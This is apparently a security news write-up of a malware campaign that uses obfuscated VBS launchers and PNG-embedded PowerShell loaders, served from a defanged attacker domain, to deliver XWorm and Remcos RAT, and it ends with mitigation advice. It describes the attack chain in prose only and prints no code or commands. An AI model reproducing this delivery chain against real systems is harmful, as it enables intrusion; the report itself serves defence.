Malware - Open Directory Campaign Uses Obfuscated VBS Files

What Happened

A sophisticated malware campaign has emerged, utilizing obfuscated Visual Basic Script (VBS) files and PNG-embedded loaders to deploy Remote Access Trojans (RATs). This multi-stage attack was first detected in early 2026 during routine endpoint monitoring. What initially appeared to be a simple alert quickly unfolded into a well-organized operation, revealing a delivery framework capable of pushing various malware payloads from a single infrastructure.

The campaign began with a suspicious VBS file named Name_File.vbs, found in the \Users\Public\Downloads\ directory of a compromised system. SentinelOne's endpoint protection caught and quarantined the file, but the encoded content warranted further investigation. Analysts from LevelBlue discovered that this alert was just the tip of the iceberg, leading to the identification of multiple obfuscated VBS files linked to different malware payloads, including XWorm variants and Remcos RAT.

Who's Being Targeted

This malware campaign targets organizations that may not have stringent security measures in place. The attackers leveraged an infrastructure hosted on an attacker-controlled domain, news4me[.]xyz, which featured openly accessible directories. These directories served various roles, including staging VBS launchers and hosting obfuscated payload files. The campaign's design allows for rapid updates and expansions of hosted payloads, making it a flexible and scalable threat.

The attackers' choice of using obfuscated scripts and PNG files allows them to bypass many traditional security measures. As organizations continue to rely on endpoint detection systems, the sophisticated nature of this campaign poses a significant risk to their security posture.

Signs of Infection

The infection mechanism begins with the VBS file, which acts as a launcher without containing active malicious code. Instead, it executes a Base64-encoded PowerShell command that fetches a PNG file from a remote server. This PNG file, seemingly innocuous, contains hidden malware that loads directly into memory, allowing the attackers to maintain a low profile.

Once executed, the malware downloads additional payloads, including an instance of Remcos RAT and a DLL designed to bypass User Account Control (UAC). This approach enables attackers to gain persistent access to compromised machines while leaving minimal traces on disk, complicating detection efforts for security teams.

How to Protect Yourself

Organizations should take immediate action to mitigate the risks posed by this malware campaign. Restricting the execution of VBS and BAT files from user-writable directories is crucial. Additionally, enforcing constrained PowerShell policies and enabling in-memory execution logging can help detect such threats early.

At the network level, blocking WebDAV connections and filtering out .xyz domains can limit access to the attacker's infrastructure. It's essential for organizations to not only rely on endpoint protection but also engage in deeper threat intelligence investigations to uncover broader attack vectors. Stopping one alert is not enough when the underlying infrastructure remains active and ready to deploy new attacks.